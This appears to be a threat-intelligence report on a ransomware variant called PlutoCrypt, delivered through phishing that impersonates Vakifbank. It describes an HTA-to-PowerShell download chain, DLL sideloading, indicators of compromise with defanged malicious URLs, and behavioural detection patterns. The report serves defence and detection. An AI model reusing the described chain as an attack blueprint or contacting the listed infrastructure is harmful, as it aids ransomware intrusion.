Full Report
Pivoting through the execution chain of a CryptoJoker Ransomware copycat
Analysis Summary
# Tool/Technique: PlutoCrypt Ransomware (CryptoJoker Variant)
## Overview
PlutoCrypt is analyzed as a variant of the CryptoJoker Ransomware, demonstrating a multi-stage execution chain initiated via spear phishing. Its primary purpose is to encrypt user files and likely demand a ransom.
## Technical Details
- Type: Malware family (Ransomware variant)
- Platform: Windows (Implied by use of HTA, PowerShell, Wscript.Shell)
- Capabilities: Multi-stage execution, downloading secondary payloads using PowerShell, file encryption (implied by ransomware designation).
- First Seen: Not explicitly mentioned, but linked conceptually to CryptoJoker.
## MITRE ATT&CK Mapping
The execution chain shows techniques related to initial access, execution, and defense evasion through complex scripting and file manipulation.
- **TA0001 - Initial Access**
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Implied by downloadable attachment in email)
- **TA0002 - Execution**
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell
- T1059.001 - PowerShell
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (JS obfuscation)
- T1564.001 - Hide Artifacts: Hidden Files and Directories (Implied by subsequent steps)
- T1562.001 - Disable or Modify Tools (Implied by subsequent steps like DLL sideloading)
## Functionality
### Core Capabilities
- Initial delivery via spear-phishing email targeting Turkish individuals/organizations.
- Execution starts with a compressed HTML Application (.hta) file containing obfuscated JavaScript.
- JavaScript utilizes `Wscript.Shell` to execute an encoded PowerShell script.
- PowerShell script is responsible for downloading subsequent XML/data files (`x.xml`, `task.xml`, `t.pd`, `u.dl`) and an executable (`pl.exe`) from specified URLs.
- Creation of files like `task.xml` and `iotlog.pdf` staged in the `%env:appdata%` directory.
- Execution of staged components using `schtasks.exe` (via XML) and `start-process` for dynamic system interaction.
### Advanced Features
- **Multi-stage infection chain:** Heavily layered execution involving HTA -> Obfuscated JS -> Encoded PowerShell -> File downloads -> Final Payload execution.
- **Defense Evasion:** Uses file duplication of System32 folders and DLL sideloading techniques (implied by interaction with `uxtheme.dll`).
- **Dynamic Payload Retrieval:** Downloads necessary components from C2 infrastructure using `Invoke-WebRequest`.
## Indicators of Compromise
- File Hashes:
- vakifbank iot-10-04-2023logs.rar: `9026c67b52f9ddece9a7e203978e8aa9ffa5a128cf83a238c924dce141899aec`
- vakifbank iot-10-04-2023logs.hta: `b05328077aa1dd5dba4d8e25cb028dc4f533bd1dd69bc6d12ec2f8298598f803`
- task.xml: `6cbed31fdf5554ead21de9ccdd12ccc6d9f0b4eaf5f874ce96103ab01f522073`
- uxtheme.dll: `8279282e07e2fa82cad4f0cb0b450e77dab930a7db7c9488f663002753d79dde`
- x.xml: `df38a5d9d7d6c9cfea65eb562317f71bea94a0fc731e1fe9121f9479e56f61fd`
- enc.xml: `20cf29f926a18b44f580137ddb65d81bc0ed419412910a7682ee7b95b186ac82`
- pl.exe: `e8527f309846d18fbf85289283dcde7b19063a50b11263ba0d36663df8fcfd30`
- File Names:
- Initial archive: `vakifbank iot-10-04-2023logs.rar`
- HTA stage: `vakifbank iot-10-04-2023logs.hta`
- Downloaded stages: `x.xml`, `task.xml`, `iotlog.pd` (converted to `iotlog.pdf`), `pl.exe`
- Sideloaded DLL: `uxtheme.dll`
- Registry Keys: Not explicitly detailed in the provided text excerpt.
- Network Indicators:
- http://hostdone[.]ddns[.]net/x1.xml
- http://hostdone[.]ddns[.]net/task.xml
- http://hostdone[.]ddns[.]net/t.pd
- http://hostdone[.]ddns[.]net/u.dl
- http://hostdone[.]ddns[.]net/pl.exe
- http://hostdone[.]ddns[.]net/e
- IP: `199.192.20[.]58`
- Domain: `deni[.]tk`
- Behavioral Indicators:
- Creation of HTML Application execution.
- Use of `Wscript.Shell` to execute encoded PowerShell.
- Excessive network connections (HTTP GET requests) to retrieve resources.
- Use of `schtasks.exe` to create scheduled tasks.
- DLL search order manipulation/sideloading.
## Associated Threat Actors
- Not explicitly named, but the malware family is related to **CryptoJoker** and potentially **NocryCrypt0r** based on shared BTC wallet history referenced in the article.
## Detection Methods
- Signature-based detection: Recognized file hashes for the initial payloads and subsequent downloaded files.
- Behavioral detection: Monitoring for HTA execution that spawns PowerShell, heavy use of `Invoke-WebRequest` in scripts, and suspicious use of `schtasks.exe` or DLL sideloading patterns.
- YARA rules: Not provided in the source material.
## Mitigation Strategies
- Email Gateway filtering to block suspicious attachments (RAR, HTA).
- User training emphasizing caution regarding unsolicited emails, especially those impersonating financial institutions (Vakifbank).
- Application control policies to restrict the execution of HTA files or scripts in sensitive environments.
- Implementing network egress filtering to block connections to known malicious domains/IPs.
- Enforcing robust permissions to limit the ability of dropped binaries to write to system paths or execute persistent mechanisms.
## Related Tools/Techniques
- CryptoJoker (Base ransomware family)
- DLL Sideloading
- System32 folder duplication